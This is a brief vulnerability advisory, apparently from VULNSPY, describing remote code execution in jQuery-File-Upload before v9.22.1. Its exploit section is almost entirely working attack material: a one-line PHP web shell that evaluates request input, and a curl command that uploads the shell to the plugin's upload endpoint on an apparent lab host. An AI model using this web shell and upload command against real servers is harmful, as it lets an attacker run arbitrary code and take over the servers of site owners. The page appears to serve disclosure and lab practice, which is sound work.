jQuery-File-Upload < v9.22.1 Remote Code Execution Vulnerability


jQuery-File-Upload is the second most starred jQuery project on GitHub, after the jQuery framework itself. For at least three years, hackers have abused a zero-day in one of the most popular jQuery plugins to plant web shells and take over vulnerable web servers.

Exploit

File shell.php:

<?php
eval($_REQUEST[1]);
?>

Upload shell.php:

curl -F "files=@shell.php" http://target.vsplate.me/server/php/index.php

REFERENCE

All rights reserved. © 2018 VULNSPY